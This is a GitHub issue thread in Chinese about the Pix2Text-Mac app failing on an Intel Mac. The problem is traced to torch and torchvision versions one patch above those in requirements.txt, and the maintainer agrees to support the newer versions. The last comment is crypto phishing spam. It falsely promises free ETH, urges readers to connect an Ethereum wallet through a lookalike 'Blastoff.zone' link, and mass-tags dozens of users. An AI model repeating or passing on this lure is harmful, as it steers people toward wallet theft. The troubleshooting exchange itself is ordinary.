### ISSUE TITLE
macOS14.4,Mac mini 2018 intelCPU,

### ISSUE THREAD

**Issue by nooneqwq** [breezedeus/Pix2Text-Mac#2]
https://py2app.readthedocs.io/en/latest/debugging.html
![WechatIMG69](https://github.com/breezedeus/Pix2Text-Mac/assets/53965772/0bd46b35-e926-4aa5-8b59-c8c15412b442)
按照报错信息提示，从命令行运行依然无效。

**Comment by nooneqwq** [comment]
@horennel @breezedeus 大佬们可以提供一个解决思路么？还是你们都用的ARM架构的Mac。

**Comment by breezedeus** [comment]
你试试本地能不能运行成功 Pix2Text：
（最后的图片换成你本地的一张图片）

```bash
p2t predict -l en,ch_sim -a mfd -t yolov7_tiny --resized-shape 768 --save-analysis-res out_tmp.jpg --auto-line-break -i docs/examples/mixed.jpg
```

Pix2Text 更多说明：https://github.com/breezedeus/Pix2Text

**Comment by nooneqwq** [comment]
> 你试试本地能不能运行成功 Pix2Text： （最后的图片换成你本地的一张图片）
> 
> ```shell
> p2t predict -l en,ch_sim -a mfd -t yolov7_tiny --resized-shape 768 --save-analysis-res out_tmp.jpg --auto-line-break -i docs/examples/mixed.jpg
> ```
> 
> Pix2Text 更多说明：https://github.com/breezedeus/Pix2Text

好的 感谢！我看了下运行您说的这条测试命令，是torch版本问题，不知道为啥torch和torchvision都高了一个小版本，我都是用的venv安装的，手动把torch和torchvisioin按照p2t的requirements.txt的版本装了一下，本地运行p2t能成功了。

**Comment by breezedeus** [comment]
@nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？

**Comment by nooneqwq** [comment]
> @nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？

我电脑不在身边，没记错的话都比最新的p2t的requirements里面高一个最小的版本，也就是torch==2.2.1，torchvision=0.17.1,我很好奇为啥我按照requirements.txt来安装到venv里会高一个小版本。

**Comment by breezedeus** [comment]
> > @nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？
> 
> 我电脑不在身边，没记错的话都比最新的p2t的requirements里面高一个最小的版本，也就是torch==2.2.1，torchvision=0.17.1,我很好奇为啥我按照requirements.txt来安装到venv里会高一个小版本。

收到，感谢🙏

**Comment by nooneqwq** [comment]
> > > @nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？
> > 
> > 
> > 我电脑不在身边，没记错的话都比最新的p2t的requirements里面高一个最小的版本，也就是torch==2.2.1，torchvision=0.17.1,我很好奇为啥我按照requirements.txt来安装到venv里会高一个小版本。
> 
> 收到，感谢🙏

大佬是要测试一下为啥么 我在GPT的聊天记录里找到了报错的截图，可能是一个torch的包名变化的问题？
![image](https://github.com/breezedeus/Pix2Text-Mac/assets/53965772/89bb808d-2052-44ef-b99c-30344b25678e)

**Comment by nooneqwq** [comment]
> > > @nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？
> > 
> > 
> > 我电脑不在身边，没记错的话都比最新的p2t的requirements里面高一个最小的版本，也就是torch==2.2.1，torchvision=0.17.1,我很好奇为啥我按照requirements.txt来安装到venv里会高一个小版本。
> 
> 收到，感谢🙏

大佬是要测试一下为啥么 我在GPT的聊天记录里找到了报错的截图，可能是一个torch的包名变化的问题？
![image](https://github.com/breezedeus/Pix2Text-Mac/assets/53965772/89bb808d-2052-44ef-b99c-30344b25678e)

**Comment by breezedeus** [comment]
> > > > @nooneqwq 方便说下你之前有问题的 torch 和 torchvision 是什么版本号吗？
> > > 
> > > 
> > > 我电脑不在身边，没记错的话都比最新的p2t的requirements里面高一个最小的版本，也就是torch==2.2.1，torchvision=0.17.1,我很好奇为啥我按照requirements.txt来安装到venv里会高一个小版本。
> > 
> > 
> > 收到，感谢🙏
> 
> 大佬是要测试一下为啥么 我在GPT的聊天记录里找到了报错的截图，可能是一个torch的包名变化的问题？ ![image](https://private-user-images.githubusercontent.com/53965772/313439948-89bb808d-2052-44ef-b99c-30344b25678e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTA2NDA2NTUsIm5iZiI6MTcxMDY0MDM1NSwicGF0aCI6Ii81Mzk2NTc3Mi8zMTM0Mzk5NDgtODliYjgwOGQtMjA1Mi00NGVmLWI5OWMtMzAzNDRiMjU2NzhlLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDAzMTclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwMzE3VDAxNTIzNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWI2ZmFiYmRlNmExOTRmMGUxMmQ4ZmU2ZDBkMjJiYjFlYmJjZDE2NjNjNDZmZTUzMjI5YWMzYjJiZWM4MWU2YzQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.900-HOqSIzOhlVITZl2xm9L2LAFinDIDp8AI2QnfyXo)

嗯，是的。我去兼容下最新版😅。 谢谢🙏

**Comment by ichikawa-itbook** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
lhiqwj173, @Ivanqi, @onestraw, @qpqyc2005, @michaelearncoding, @Ogalababa, @Vssblt, @ACTIONFWY, @netactspcl, @asmjmp0, @S0b3Rr, @xiaojinisking, @bigdatata, @AnandrewChan, @ztbaby325, @YueHub, @zyhong, @amxku, @zhaoluo, @Colt1990, @xulin5482, @zhangzdc, @cc2415, @zekizz, @ugozhou, @scjxd, @dzneilyou, @laevox, @augusyan, @xudaotutou, @stephen9412, @arunpraba, @zhanghj, @ZSMX, @Abbrave, @opzede, @beihaiguaishou, @ZuoMLin, @gongnan, @Zoltan3057, @linzowo, @zxd6655422, @dyike, @adamzhang1987, @CopperBat, @Moses0905, @st0pli, @SallyKAN, @JulianZhang, @FingerLiu
